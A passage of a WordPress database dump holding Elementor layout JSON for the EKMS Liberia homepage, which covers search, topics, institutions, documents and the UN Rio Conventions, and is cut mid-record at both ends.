fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19088,2794,'_elementor_version','2.7.5'),(19089,2794,'_elementor_template_type','wp-page'),(19090,2794,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19094,2795,'_wp_page_template','default'),(19095,2795,'_elementor_edit_mode','builder');
INSERT INTO `wp_postmeta` VALUES (19096,2795,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_